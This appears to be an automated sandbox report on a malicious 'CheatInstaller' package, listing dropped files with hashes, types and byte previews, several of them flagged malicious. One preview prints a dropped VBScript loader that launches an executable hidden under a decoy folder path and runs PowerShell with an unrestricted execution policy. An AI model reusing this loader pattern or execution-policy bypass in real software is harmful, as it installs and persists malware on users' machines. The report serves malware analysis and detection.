              SHA-256:9D0E13FF2E27A1E3DD01847E67CF787050764C8B1369D90A60A3A03AA498D00A
              SHA-512:E2216AB419EDB6378CA85F1593330A2D68AA6867E4145A93A6A9C4FC0FC80A11F89F6F270AE95549982F0F5F4142512C6B3DB7F6FD626971FA26295BCCC88B46
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%.........................................................................................................................................................................)./.......:.........4.o...=.......Z.I.E.....=.T.Z.#.......%.A.P...:.3.....;...........................3...C...j.....~...%.....................).........G...................).%.......~...................................................................*.A.................g.........m.......&.W.....e.....l.|...>...P...7.C.e.>...9...g.............5.....J...........'. ...4...k.......$.......H.(.....H...6.....0...../...=.I.....P...,....... .....9.....................A...................#.%.....Q.....h.....V.....L...G._.....h...x.......`...8...p.e.5.R...J.......p.0.......L...3.Q...........r...#.....1.......{.........I.~...........$.........=.}.....e.@.h.....u.....H.......{.E.....W.....4.....9.1...v...*.M...,.#.../.......%...................'...9...../. ...N...............w.,.........6.
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):5.14921482194514
              Encrypted:false
              SSDEEP:
              MD5:853A0BDC85B59FC1A06781F42FD0216F
              SHA1:24426A4E7C4F2BE495B0DE7E0788F8682F9A31FB
              SHA-256:3AE7B8FD29A0224527A0027EFFD3578A1933A0871B5C37C45945F8FC172CF62F
              SHA-512:14E566ADFF211AB23CD9823354E97AD4AB781DFF3B0A71D9C434D36FAEFED44E2DBDB407482317FAA474EE24258B1215DBCD04BA04A8D9040152ABA67A37206D
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%.@.......{...J..w....._.............*......e......h.......?.g.N...x.a...m...h...#.........?.....-.k...........U...O.Z..............F.5.....:.j.-.G.......m.....................A.$...I.c.`.@..........."...........I.........Q.....5.................w......b.e...\.x.........r...m.x.).$.x.....k...#.}.....K.6.......u.k..........A...X.v...e......p.q......r...d.....\.W.;.m.j.e........*..+.....&.q.....}....)...........f.U...$.......\.\.w...E...T...D......._.].[.............J.8.....<..5.R.....Z...c.g._...p.r.....Y...c.}....F.....;.d./.].z...e...$.L..3..!&.y.E.&.(.!.....e.}.....|...n...T.*.........R.....d.....6.....b.V...s.\....3...!.s.N.}...w.......~.r.....D.V.)...4.X.G.1.....w...:......".W.L.........6..............!#......0..........}......B.-.C....M. .@....y...t.K...}...G.......J..._..............D.".:.i...P.........H...&.,...........W.......8... ...........4.u...q*......>.. \.=.......<.....(.........[..................-.....
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):3.5498326111441396
              Encrypted:false
              SSDEEP:
              MD5:904CCCD295D852FF49BCE31AB91A85FE
              SHA1:AAB7323C0F09DD6DE9E61FE4798068F34726F32D
              SHA-256:896759170C3F3DA93CF1845B58A27F2DE54DBC3848D46C8B8E742C650C00FB30
              SHA-512:A8726F1BAC112CA588D7DC3BA98426025477F0C4AEFF6C33AF7C6E7F3CADBDADB1EB73957E12AC6CE7515F379D395AB0DC940B80F38FE843C7591F0AE69C361E
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%.."m7&.. qL..Q .V./.....#@... .3.K.M.C.\.....H.Q.........A.....].......T.L.t.....[.p...v..>..q.V.j@.7.(.EsE.8.4dB.HG4u%+!.+.8'6.".$.G.+@..-pE...".C.PcRc3_B.A.4.=s:.BI/.$..M(.%.......q...o..%........#.;.a../.5.#........w.......Y....!.I.6.".k.x..2...E.g.a...f....K.....A......z.......*/g&.'.>$[.7.<~O.SSZ.cOo._.l.a.M.b.\.O.T.`.QyD.G.;[H.FM5D3.1p?r8P...~.P......._...x....@......3...N...c...H.^...m......h...x.........i......2...k........|.......5.+.......L....(.)c.....s-..m..*.*.!.".2v4A-.%.%.,.7L4j$15.-X..3.H.7.#u+.8....q*Q'."G.4.i.....N.(.x..... ...1..... ...+...s.:.0.V.....>.5...`..x.....8......8.f..X......@..........g......,.$...v.3..x.w.q.....`.P.G.............E.. ..y..&.3&:.5.9hA.7,@aM.G.O.I.G.P.DCL^LV>17~HkK.0.:L6.+.-_..&.,O%5.Z...T.F...-.....l.<.m...[..p..e...?....A..3.....K...j....o.6.{...J...t.+.E.:..........<...?...N..+.1.N......~.....>.h.8.....1.. .........&W%..k$.<.-G".,i .0.2...%~.t(.=.#.../....
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):4.3417250437660835
              Encrypted:false
              SSDEEP:
              MD5:76E4BCF00155868A04DA362E3EAB8F1D
              SHA1:61A69467F77DD11FAF27D89C0551DBDE841EF6D7
              SHA-256:F5216444BD05C2C0E5333287D83CADA96CAD9F90DBD6F3737A97ABBF0FB3510F
              SHA-512:4B28BC8C0CF957959FA6D675E5FA4B5B9613746C3D0355A12CEB6C17A4447D37ECC7232EEFD8D1E53D052DF06522BF4B4A98D11A90365DC2D7D70127427DD600
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):13425
              Entropy (8bit):5.907067590048298
              Encrypted:false
              SSDEEP:
              MD5:214EE30DBD649AF9294F254FC8C33D07
              SHA1:E81A7486C5C19868ABB7D39FC757F686C4124662
              SHA-256:D9747024F7951C01C90B39E18EBE0A490A956625422F165D53F917AE062C4E52
              SHA-512:F1309C116FCAA64B372946686C3A22B0574DB717AEF91C095FBB70CBEB4125077F363AD9CE0D4A9EC12BC9F61D61DF8EF35F5AC20A6A8B9F68B95203B5F93D19
              Malicious:false
              Reputation:unknown
              Preview: Wscript.sleep 60000...Dim fso, vFolder, shl...Set objFso = WScript.CreateObject("Scripting.FileSystemObject")...Set shl = CreateObject("Wscript.Shell") ...set objWShell = wScript.createObject("WScript.Shell")...usrName = objWShell.expandEnvironmentStrings("%USERNAME%")...Set fso = CreateObject("Scripting.FileSystemObject")...If fso.FileExists("C:\Users\" & usrName & "\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe") Then....Call shl.Run("C:\Users\" & usrName & "\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe") ....Set shl = Nothing ....WScript.Quit .. End If...Set objShell = CreateObject("Wscript.Shell") ...objShell.Run("powershell.exe -noexit -ExecutionPolicy unrestricted C:\Users\" & usrName & "\AppData\Local\watchdog.ps1")..'' SIG '' Begin signature block..'' SIG '' MIIc1gYJKoZIhvcNAQcCoIIcxzCCHMMCAQExDzANBglg..'' SIG '' hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor..'' SIG '' BgEEAYI3AgEeMCQCAQEE
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200, Security: 0, Code page: 1252, Revision Number: {E80C0689-9541-4B8A-A2F7-42C1223131F6}, Number of Words: 0, Subject: CheatInstaller, Author: OpenSource, Name of Creating Application: CheatInstaller, Template: ;1033, Create Time/Date: Tue Mar 12 08:44:30 2024, Last Saved Time/Date: Tue Mar 12 08:44:30 2024, Last Printed: Tue Mar 12 08:44:30 2024
              Category:dropped
              Size (bytes):6535168
              Entropy (8bit):6.6685238248765115
              Encrypted:false
              SSDEEP:
              MD5:88D6EF66043282511D78477C3457CD05
              SHA1:DEDF2529B0F78F9D7DFE5519D080FE1D11FB0344
              SHA-256:82EFCBDA4A568F2E898F2C97D3876AF8C4C42F2638A339B937B01202BB83FB4A
              SHA-512:506E03B18E11C6133EB4B997BFD017AB5E5ED7A253E0470EE391D8BF5F86196742B57EC03316F1D5699F7A2F556DF38468C539A6FF70C52E092BF0C1DE61FA2B
              Malicious:false
              Reputation:unknown
              Preview:......................>...................d...................................W...............q`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:MySQL MyISAM index file Version 1, 4 key parts, 0 unique key parts, 2 keys, 0 records, 2 deleted records
              Category:dropped
              Size (bytes):5120
              Entropy (8bit):0.35653096793977856
              Encrypted:false
              SSDEEP:
              MD5:F0BB4307AFBD586F0499F4023213863D
              SHA1:CD978F445F02AAB75B1D89C5E28E348860D8C306
              SHA-256:49A2CD5CE74B5969DB3EB785C02FDA21F207672B2348C95252B3200D05281129
              SHA-512:A4327E9535D84AD98B4880764A05141170FEBF1C02D3FB74F71D704185E8176545C15ECFA34E5C8218CC33F4B7F07DEB1FE0F2C06C1B400A3798A75016DE861C
              Malicious:false
              Reputation:unknown
              Preview:.......E...d........S.....9................................................p.......p................................................................................`..)............`..)............`..).........................................................................................................................................S.................S.................S.......0...u...........6...7.S.......0...u
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:MySQL MyISAM index file Version 1, 2 key parts, 0 unique key parts, 1 keys, 1028 records, 0 deleted records
              Category:dropped
              Size (bytes):19456
              Entropy (8bit):2.827514215538035
              Encrypted:false
              SSDEEP:
              MD5:B7D1F26327BF857BF6CE98EA4FDA22B1
              SHA1:B3F9C0DD62D5A7F533BE36664F8E4954CD1F216D
              SHA-256:7CE3F6771B4C0A0C0E662DC51ECB460AAE223BB3292EAEA6C1C6F1BB805B3786
              SHA-512:91E83B2A3AA885E240F2634D15662954AA0D1104B85AE7BF33948B6BCFFCBF763BADDB3ECDABD15DE53D6EDA23D765716891B4DBAAF70168B837480F055E5AB2
              Malicious:false
              Reputation:unknown
              Preview:.......q...d........!.....9.......................................L.......$$..................................yh....................................`..)............`..).................................................................................................................................................?.....@...........?.....@......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:CSV text
              Category:dropped
              Size (bytes):2522
              Entropy (8bit):3.4733841593428103
              Encrypted:false
              SSDEEP:
              MD5:5B1A12EDC7B4E82163E5B39694E5B630
              SHA1:088D6DF18CE940CF01789A27ADEAA150F9DC26B7
              SHA-256:206BAC7B50B6BD8467CCFFCB6D0833C4C8C58A2E82D205F608D4127DDC3402C9
              SHA-512:07846AD52962FC7F07B9E950343F906DB5AC09287CED6D4659DAE5F99F3FC8EE02916D66557DC2A0A7EDBCA0A716D8B26C252642558417986532CC28428494CC
              Malicious:false
              Reputation:unknown
              Preview:..0.0.1.,.".U.t.i.l.i.s.e.r. .d.e.s. .n.o.m.s. .d.e. .d.o.s.s.i.e.r.s. .l.o.c.a.l.i.s...s.".....0.1.0.3.,.".M.i.s.e. ... .j.o.u.r.".....0.4.0.0.,.".A.n.n.u.l.e.r.".....0.4.4.1.,.".E.-.m.a.i.l.".....0.4.4.2.,.".I.m.p.r.i.m.e.r.".....0.4.4.3.,.".C.o.n.t.i.n.u.e.r.".....0.4.4.4.,.".Q.u.i.t.t.e.r.".....0.4.4.7.,.".U.n.e. .e.r.r.e.u.r. .i.n.a.t.t.e.n.d.u.e. .s.'.e.s.t. .p.r.o.d.u.i.t.e. .e.t. .a. ...t... .i.n.t.e.r.c.e.p.t...e. .p.a.r. .l.'.a.p.p.l.i.c.a.t.i.o.n... .E.n.v.o.y.e.r. .l.e. .r.a.p.p.o.r.t. .d.'.e.r.r.e.u.r. ... .'.%.1.'. .p.o.u.r. .q.u.e. .l.e. .p.r.o.b.l...m.e. .p.u.i.s.s.e. ...t.r.e. .a.n.a.l.y.s... .e.t. .c.o.r.r.i.g... .d...s. .q.u.e. .p.o.s.s.i.b.l.e...".....0.4.4.8.,.".C.e.l.a. .v.o.u.s. .p.e.r.m.e.t. .d.'.i.m.p.r.i.m.e.r. .l.e. .r.a.p.p.o.r.t. .d.'.e.r.r.e.u.r...".....0.4.4.9.,.".C.e.l.a. .e.n.t.r.a...n.e. .l.'.e.n.v.o.i. .d.e. .v.o.t.r.e. .p.u.b.l.i.p.o.s.t.a.g.e. .e.t. .l.'.o.u.v.e.r.t.u.r.e. .d.'.u.n. .n.o.u.v.e.a.u. .m.e.s.s.a.g.e...".....0.4.5.0.,.".C.o.n.t.i.n.u.e.
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:data
              Category:dropped
              Size (bytes):70596092
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:43A907E3E919CBDC3DFAE78B68949212
              SHA1:5950D53E8110776C9A0463093A0928335E804A0C
              SHA-256:B80DCB6AF4814BF5C0B6E460CA7B6BF3A970242869B83ED62208AE21F9504D94
              SHA-512:36987EF7E6CF1C89412D373D6F67FD628C3A9DAA2F74EC184B8C0EB93F2A22960F0F8FBB61204A7FD89E7FD7B1641D91D3EB4A1B1633C7DBDEE0F81A5F1A3BFC
              Malicious:false
              Reputation:unknown
              Preview
              Process:C:\Windows\System32\msiexec.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):511080
              Entropy (8bit):6.729003850618356
              Encrypted:false
              SSDEEP:
              MD5:18DB7A45912D1664716EFDF6E311F5F1
              SHA1:24A5D1D2ADDF8095E6F5E4040A2E1C44956BB141
              SHA-256:5FFA59B2CB0995AF80DE9CE944BB3E2933C42CEA0D764C0AF137FF842DC7FD0C
              SHA-512:5BC3DB53B113D9098170EAC6AC1FD2327E6E02F6E5E5E6A5C48E861E1FF683FD2A88928638A0F046A8B89488D6CE1F9EBA9952AA34B5AB0858F671B890F250FF
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........'5..If..If..If*.Jg.If*.Lg_.If*.Mg.If..Mg.If..Jg.If..Lg..If*.Hg.If..Hf$.If.,@g.If.,Ig..If.,.f..If...f..If.,Kg..IfRich..If........................PE..L....).e.........."!...%.<...`......Da.......P......................................&%....@..........................F.......G..........p...............h:......(6......p...............................@............P..8............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data........`.......D..............@....rsrc...p............T..............@..@.reloc..(6.......8...Z..............@..B................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\msiexec.exe
              File Type:data
              Category:dropped
              Size (bytes):8345995
              Entropy (8bit):6.68862919643579
              Encrypted:false
              SSDEEP:
              MD5:94F99BEE6A7C202CE2E8194514D9A6ED
              SHA1:ADF190EC0A86E148F0ED2194ACC0CD8773418DED
              SHA-256:A9875B8ACDCE1984C7FE58508798FDFC8963C9B5A878DAF0D6888A48D836DC76
              SHA-512:5BAF4ECDFB090A8499D359DC1F8C186B7A0A2F0FF2E436DAD26B9167CFF411D53FE8485EE8ADEA6D431662FA68DBBF47E0F8CEAA983CABAE37B7F780762C31FD
              Malicious:false
              Reputation:unknown
              Preview:...@IXOS.@.....@..|X.@.....@.....@.....@.....@.....@......&.{AA26797C-3E2C-42C1-A832-A687DE957A1C}..CheatInstaller..YTtSTCHEAT.msi.@.....@.. ..@.....@........&.{E80C0689-9541-4B8A-A2F7-42C1223131F6}.....@.....@.....@.....@.......@.....@.....@.......@......CheatInstaller......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{7CB67576-CC77-4A95-904F-CC1D1FDF3D96}1.C:\Program Files (x86)\OpenSource\CheatInstaller\.@.......@.....@.....@......&.{7EBC63B1-6868-42AD-8F42-7A8483E554C1}I.C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\.@.......@.....@.....@......&.{7E3DCA32-366C-4D87-A97D-D5E4A4578089}2.C:\Users\user\AppData\Roaming\guestaddon\services\.@.......@.....@.....@......&.{ACFCF79F-5E36-4077-84BD-3303CD7A90A3}=.C:\Program Files (x86)\OpenSource\CheatInstaller\lang_fre.txt.@.......@.....@.....@......&.{F9E007D5-91EB-4408-A0A4-8C8437DF0
              Process:C:\Windows\System32\msiexec.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):746600
              Entropy (8bit):6.718193640210278
              Encrypted:false
              SSDEEP:
              MD5:165F730F078C7019EA5F2642F8208CDA
              SHA1:370F2E4D1F298B62C1D4743D0E23D2A2D41F950D
              SHA-256:48F509D74CA1AFA44B3053E5FB0DDC15D56CA8844E9D150419891C5A38A071A6
              SHA-512:36868C499B28F96853FB77A1DACEF2AD2A06EE7B1BE41FF2782AC0F90DD247F522DC64951FA72BB77A85D930DDFFE28B06EB391E5BF803E396ADAA7211C183B6
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E.V.+.V.+.V.+...(.].+.......+.C./.G.+.C.(.N.+.C.....+.ne(.W.+.../.A.+...*.O.+.V.*.h.+.ne".9.+.ne+.W.+.ne..W.+.V..W.+.ne).W.+.RichV.+.................PE..L....).e.........."!...%.(...N...............@.......................................Z....@.............................D...........@...............*..h:...P..tV..0...p...........................p...@............@..D............................text....'.......(.................. ..`.rdata..,....@.......,..............@..@.data...@a..........................@....rsrc........@......................@..@.reloc..tV...P...X..................@..B................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\msiexec.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):414408
              Entropy (8bit):6.543997028727907
              Encrypted:false
              SSDEEP:
              MD5:8D49691D4AB2FA3CD8C679C0DF30C1A1
              SHA1:71B8B4619A2B0632920F84F740E7B27AF62A921E
              SHA-256:8412DC56077A9219C7CD04E0FCCC2391EB62E32A86AD27E58B24D83C8E8227A5
              SHA-512:128B1544A4A2FDE1EEBEADDB2B75A122F7C29F79AD47B7BC648198FDD06047FFEDD9601A4BC7808EF51153005986A0FDFB0A06409C23411D13B299BDA64AA9F5
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............h...h...h.......h......sh.......h.......h......h.......h.......h.......h...h...h.......h.......h...he..h.......h..Rich.h..........PE..L....).e.........."....%............(.............@..................................%....@..........................................0..8............6.......@...9..p...p...............................@...............l............................text.............................. ..`.rdata..............................@..@.data....7..........................@....rsrc...8....0......................@..@.reloc...9...@...:..................@..B................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\msiexec.exe
              File Type:PE32+ executable (GUI) x86-64, for MS Windows
              Category:dropped
              Size (bytes):539752
              Entropy (8bit):6.432994694262419
              Encrypted:false
              SSDEEP:
              MD5:CE5552C3B309A5F507B31C0AF0C0CABF
              SHA1:5A5A35EA887677E411EA5EA86DD6881D62DB6EDF
              SHA-256:3C2DC5BA528D5C31CEFACC19F693B35512EB7D500511B0DBC79762D3F5F7842C
              SHA-512:4234EE20B71D6F0BED70179344C830BE3B18FF53C3652C559F2BC2CD2B7DAE142761A8BA77EF2102AC87351CCBB83EE50C855259DD0D7178A75B4412DC5B2389
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......... ...s...s...s2..r...s2..rO..s...r...s...r...s...r...s2..r...s2..r...s2..r...s...s7..s.H.r...s.H.s...s..js...s.H.r...sRich...s........PE..d....).e.........."....%.....4.................@.............................`............`..........................................................@..8.......$?......h:...P..l.......p.......................(.......@............................................text...\........................... ..`.rdata..f...........................@..@.data....F..........................@....pdata..$?.......@..................@..@_RDATA..\....0......................@..@.rsrc...8....@......................@..@.reloc..l....P......................@..B................................................................................................................................................................................................
              Process:C:\Windows\System32\msiexec.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):736360
              Entropy (8bit):6.613353362084912
              Encrypted:false
              SSDEEP:
              MD5:C9C085C00BC24802F066E5412DEFCF50
              SHA1:557F02469F3F236097D015327D7CA77260E2AECC
              SHA-256:A412B642DE0E94DB761EBD2834DDE72EED86E65FC4A580670A300015B874BA24
              SHA-512:A6FA1F34CD630A7509A6441BE7AD060DE7E039967D2EC015E27C2A643B04E0EECF53902B7173C4C2E92E3A890BD7ACB6A3307D9923838F0BFC71496FB184B1DE
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`.,............ws.~....ws.~.....~.~.....~.~.....~.~....ws.~....ws.~....ws.~........g......~.......~..............d........~....Rich............PE..L....(.e.........."!...%.....x......<........................................@............@..........................c.......m..,.......................h:.......l......p...................@...........@...............x............................text...V........................... ..`.rdata..............................@..@.data...@%...........z..............@....rsrc...............................@..@.reloc...l.......n..................@..B........................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\msiexec.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):210536
              Entropy (8bit):6.539722520404531
              Encrypted:false
              SSDEEP:
              MD5:CAC17C92ED0D30BC68CE60905E0AF1EA
              SHA1:29589B5816214F537FFB03A4FF9C79F1BD25908B
              SHA-256:E5A59959B68626F622C7A27B2A42468DBFE03A6D956B58B2CDCCEDF0A632D161
              SHA-512:041AAB2032745C2F800AC05EE77073167BF37F81DEE56774B498C8F1B60FDCC8F16904E909ED42EF9157DFEBEADA9998D5C155AA1A10DF1CCD608177425ACC20
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......~..:..:..:....0....../...+../...)....,../........;....+..:......O.."...O..;...OI.;..:.!.;...O..;..Rich:..........................PE..L....(.e.........."!...%.............1.......@...............................0.......q....@.....................................x.......x...............h:......@...l...p............................D..@............@..........@....................text....-.......................... ..`.rdata.......@.......2..............@..@.data...............................@....rsrc...x...........................@..@.reloc..@........ ..................@..B........................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\msiexec.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):1103976
              Entropy (8bit):6.4701876597769115
              Encrypted:false
              SSDEEP:
              MD5:6BB65410717BB2C62ED92CDBC9C41652
              SHA1:1F0D56A24588C0C07E878F348DF6BB0C3E4F693A
              SHA-256:91A6C5DAEBE89B7D9157188A2B3FA8E47D53B4D20C29BCC244635D1943397F7B
              SHA-512:1A864C6D010E3D62337A2067F53E82067AB01A556EDEE65036658BB7DD863BF22379D16AAF6385FDA23060148C68C7225610058A153420E7B125C038285CEB38
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..a f.2 f.2 f.2...3+f.2...3.f.25..31f.25..37f.25..3tf.2...38f.2...3?f.2 f.2.g.2...3.f.2...3!f.2...2!f.2 fn2!f.2...3!f.2Rich f.2........................PE..L....).e.........."!...%.Z...X.......k.......p....................................../.....@..........................y..t...$z..........................h:.......?......p...........................0...@............p..8............................text...>Y.......Z.................. ..`.rdata.......p.......^..............@..@.data................|..............@....rsrc................X..............@..@.reloc...?.......@...^..............@..B................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\msiexec.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):760424
              Entropy (8bit):6.7002090915237815
              Encrypted:false
              SSDEEP:
              MD5:A8338E7B3CE49AB7E793952765AC998F
              SHA1:29A2DD67EBA553530F84F9E02266474EA678ABDD
              SHA-256:6FA584E22FC546B95FA757279CE5569E5540BF2AC28B138ADBA41877FE0C645D
              SHA-512:85C5095099F7A689E5DD125AD8805B90F59A0E4A930EA791383A596E722D56FA62E4F85C28365C01A6EF2C3B4DDD0E53EB6A70777AD94070B49602993497A64F
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........".4.Ceg.Ceg.Cego1ff.Cego1`f.Cego1af.Ceg.<af.Ceg.<ff.Ceg.<`f.Cego1df.Ceg.Cdg.Beg..lf.Ceg..ef.Ceg..g.Ceg.C.g.Ceg..gf.CegRich.Ceg................PE..L...Q).e.........."!...%.V..........0........p......................................0.....@.........................P................0...............`..h:...@...[......p...............................@............p...............................text....U.......V.................. ..`.rdata..P....p.......Z..............@..@.data....-..........................@....rsrc........0......................@..@.reloc...[...@...\..................@..B........................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\msiexec.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):857192
              Entropy (8bit):6.579702812546788
              Encrypted:false
              SSDEEP:
              MD5:2557173F4299722AFCE46CC3C0616406
              SHA1:B0343C9A9552BE977834E415783B486C4714FE97
              SHA-256:E25369E33C7EF36151769A86D833189B275F85045F35873E9E931547E0A6D591
              SHA-512:24A46359CB8E22534CBD875FE092D096E3280CA4C24936159894BA95832233EE318494A3EABBDF73AE6010E39A1B5897B4488B2771B416B472BB7F60CEDDF40E
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Qc&.0.u.0.u.0.uTB.t.0.uTB.t+0.u.O.t.0.u.O.t.0.uTB.t.0.u.O.t.0.uTB.t.0.uTB.t.0.u.0.u.1.u...t.0.u...t.0.u...u.0.u.0.u.0.u...t.0.uRich.0.u........PE..L...Y).e.........."!...%.:...................P............................... ......{.....@..........................D......(F..........h...............h:.......r...+..p....................+.......5..@............P......dB..@....................text...\8.......:.................. ..`.rdata.......P.......>..............@..@.data...((...`.......J..............@....rsrc...h............`..............@..@.reloc...r.......t...f..............@..B........................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\msiexec.exe
              File Type:Composite Document File V2 Document, Cannot read section info
              Category:dropped
              Size (bytes):20480
              Entropy (8bit):2.487207818930286
              Encrypted:false
              SSDEEP:
              MD5:0EFB9903EE9EC6E7D0E8AB72D1864671
              SHA1:2D0356BFB5899930D543E67277A415BEC3ADEE5D
              SHA-256:B8DA41E5AEB98541D137E3B9714B7B8DEE49E11783447282006C7D77B2D14EA1
              SHA-512:2F109CB807C5E97213F6F13D79D297927F718F605CEB67429E3633846989E0EF2721140A74157DA27DD80717E27C2683286569545256ABF9978D08453C9BB5BB
              Malicious:false
              Reputation:unknown
              Preview
              Process:C:\Windows\System32\msiexec.exe
              File Type:Composite Document File V2 Document, Cannot read section info
              Category:dropped
              Size (bytes):20480
              Entropy (8bit):1.3955891601161974
              Encrypted:false
              SSDEEP:
              MD5:32C8D59126278BDA8C1C4FAEF83DA2D3
              SHA1:13C3818E8694332CC28D45031E4C575F3B5589B8
              SHA-256:1D293703202F1B765BB9BFD9BC11AB4E424525FB0EEBDA6F7DA237426F640F45
              SHA-512:60C1CF636B3A70AF8E73BBE375C7C2E26EF91FA2B340970BD907547CCD09A57F09F0D8068F8F6DABCD06AACA816B8CF6C0107D6FB579EAB233D307F0FF9490EA
              Malicious:false
              Reputation:unknown
              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\msiexec.exe
              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):454234
              Entropy (8bit):5.35617155413409
              Encrypted:false
              SSDEEP:
              MD5:C9985B61FD6F4A507731DF00B4F8E04A
              SHA1:54CAD06C32308CD297553DB7F1E85B86CAE75FE7
              SHA-256:559F5609D0720EB84C04E0BDCA13C4B0B2C0C2727026C77DB956C03A9CE05AF9
              SHA-512:AF958D706162D1C999ABB3C705D9A679D9D62657AD2A0321811DAC93F10F242181EC5634AAB34EA7FEED09FE678EDDFB75A029C239E4CA8A9DF44036DC366C03
              Malicious:false
              Reputation:unknown
